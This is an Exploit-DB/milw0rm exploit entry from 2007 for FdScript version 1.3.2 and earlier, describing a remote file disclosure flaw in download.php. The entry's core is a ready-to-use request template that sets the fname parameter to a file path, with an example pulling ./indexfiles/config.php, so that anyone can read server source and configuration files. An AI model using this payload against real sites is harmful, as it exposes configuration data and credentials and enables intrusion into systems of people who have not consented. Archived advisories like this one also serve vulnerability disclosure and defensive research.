FdScript <= 1.3.2 download.php Remote File Disclosure Vulnerability

2007-01-26T00:00:00
ID EDB-ID:3203
Type exploitdb
Reporter ajann
Modified 2007-01-26T00:00:00

Description

FdScript <= 1.3.2 (download.php) Remote File Disclosure Vulnerability. Webapps exploit for php platform

                                        
                                            *******************************************************************************
# Title   :  FdScript &lt;= v1.3.2 Remote File Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(
# Site    :  http://stud.usv.ro/~vlad_l/
# $$      :  Free

*******************************************************************************

[[SOURCE]]]---------------------------------------------------------

http://[target]/[path]//download.php?fname=[SOURCE FILE]

Example:

//download.php?fname=./indexfiles/config.php
[[/SOURCE]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-26]